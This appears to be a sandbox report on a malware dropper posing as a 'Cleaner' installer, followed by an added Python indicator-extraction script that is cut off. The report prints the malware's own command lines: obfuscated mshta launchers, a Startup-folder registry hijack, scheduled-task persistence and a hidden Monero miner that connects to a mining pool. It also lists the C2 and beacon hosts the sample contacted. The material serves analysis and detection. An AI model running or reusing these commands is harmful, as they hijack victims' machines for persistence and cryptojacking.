"C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp" /SL5="$90252,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 744
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2220 -ip 2220
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 184 -ip 184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 1660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 184 -s 1020
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "sfx_123_206.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 844
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1860 -ip 1860
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 972
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1860 -ip 1860
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1036
C:\Windows\SysWOW64\control.exe
control ..\kZ_AmsXL.6G
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 623D34B2B022F91A49405EE1160A6200 C
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1192
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1664
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\64042477274.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\38777644794.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\32748471338.exe" /mix
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 2056
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1860 -ip 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1804
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" AI_EUIMSI=1 APPDIR="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner" SECONDSEQUENCE="1" CLIENTPROCESSID="3956" CHAINERUIPROCESSID="3956Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature,RequiredApplication_1" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_PREREQFILES="C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner%20Installation.exe" AI_PREREQDIRS="C:\Users\Admin\AppData\Roaming\Cleaner" AI_MISSING_PREREQS="Required Application" AI_DETECTED_INTERNET_CONNECTION="1" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733151003 " TARGETDIR="C:\" AI_INSTALL="1" AI_SETUPEXEPATH_ORIGINAL="C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 10EEC0538907FA21A386C6467DA73E10
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4940 -ip 4940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 488
C:\Users\Admin\AppData\Local\Temp\e59a3a9.exe
"C:\Users\Admin\AppData\Local\Temp\e59a3a9.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5036 -ip 5036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 780
C:\Users\Admin\AppData\Local\Temp\e59da68.exe
"C:\Users\Admin\AppData\Local\Temp\e59da68.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 564 -ip 564
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 780
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | auto-repair-solutions.bar | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onepremiumstore.bar | udp |
| US | 8.8.8.8:53 | premium-s0ftwar3875.bar | udp |
| US | 8.8.8.8:53 | guidereviews.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | mas.to | udp |
| US | 172.67.166.96:443 | mas.to | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | abgtt.com | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.166.67.172.in-addr.arpa | udp |
| RU | 185.215.113.25:80 | 185.215.113.25 | tcp |
| RU | 185.215.113.25:80 | 185.215.113.25 | tcp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.66.101.151.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | paybiz.herokuapp.com | udp |
| US | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| US | 8.8.8.8:53 | 34.81.201.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.23.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.227.145.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.38.245.18.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ocsp.r2m03.amazontrust.com | udp |
| DE | 13.224.191.223:80 | ocsp.r2m03.amazontrust.com | tcp |
| US | 8.8.8.8:53 | 223.191.224.13.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 172.67.74.161:80 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | s3.us-central-1.wasabisys.com | udp |
| US | 38.91.42.101:443 | s3.us-central-1.wasabisys.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 101.42.91.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | paybiz.herokuapp.com | udp |
| US | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 182.186.208.54.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| NL | 51.15.61.114:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 162.19.224.121:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 114.61.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.224.19.162.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 72.84.118.132:8080 | | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
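The connection table above is noisy: the same beacons to iplogger.org and cdn.discordapp.com repeat dozens of times, every row to 8.8.8.8:53 is the sandbox resolver rather than a malicious endpoint, and the `in-addr.arpa` lookups are reverse DNS performed by the sandbox. The script below is an added example, not tooling from the report or the sandbox vendor. It parses rows of the shape `| country | ip:port | domain | proto |` plus the `path` / `| ALGO | digest |` entries of the Files section that follows, and turns them into a deduplicated indicator set. It also drops any "dropped file" whose digests are those of a zero-byte input, which is what the hashes of `15212437139445115188` in the Files section are. The sample input is a handful of lines copied from this report; the column layout and the resolver address are assumptions taken from the rows above.

```python
"""Pull deduplicated indicators out of a flattened sandbox report (added example)."""
import re
from collections import Counter

# Sample lines copied from the report above; constructed input so the script runs offline.
SAMPLE_REPORT = r"""
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 182.186.208.54.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| NL | 51.15.61.114:14433 | xmr-eu2.nanopool.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 72.84.118.132:8080 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\15212437139445115188
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
| MD5 | f39dd2806d71830979a3110eb9a0ae44 |
| SHA256 | c5763dba038b94970b85fd0a078bcb1977e3973c56780e76b443915a9c30e213 |
"""

# Assumed row layout: | country | ip:port | domain (may be blank) | tcp/udp |
NET_ROW = re.compile(
    r"^\|\s*([A-Z]{2})\s*\|\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s*\|([^|]*)\|\s*(tcp|udp)\s*\|$"
)
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-f]+)\s*\|$")
WIN_PATH = re.compile(r"^[A-Za-z]:\\")

# MD5 / SHA-1 / SHA-256 / SHA-512 of zero bytes: a dropped file with these
# digests is empty and useless as an indicator.
EMPTY_FILE_DIGESTS = {
    "d41d8cd98f00b204e9800998ecf8427e",
    "da39a3ee5e6b4b0d3255bfef95601890afd80709",
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
    "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce"
    "47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e",
}
RESOLVER = "8.8.8.8"      # assumed sandbox DNS resolver; never an indicator itself
COMMON_PORTS = {80, 443}  # anything else (14433, 8080) deserves a second look


def extract_iocs(report: str) -> dict:
    """Return domains, connection endpoints, odd ports and file hashes found in the report."""
    domains = set()
    endpoints = Counter()  # (ip, port, domain) -> number of connections
    files = {}             # dropped-file path -> {algo: digest}
    current_path = None
    for line in report.splitlines():
        line = line.strip()
        m = NET_ROW.match(line)
        if m:
            _, ip, port, domain, _proto = m.groups()
            domain = domain.strip()
            # Reverse lookups are the sandbox identifying peers, not malware behaviour.
            if domain and not domain.endswith(".in-addr.arpa"):
                domains.add(domain)
            if ip != RESOLVER:
                endpoints[(ip, int(port), domain)] += 1
            continue
        if WIN_PATH.match(line):
            current_path = line
            files[current_path] = {}
            continue
        m = HASH_ROW.match(line)
        if m and current_path:
            files[current_path][m.group(1)] = m.group(2)
    empty = sorted(p for p, h in files.items() if h and set(h.values()) <= EMPTY_FILE_DIGESTS)
    return {
        "domains": sorted(domains),
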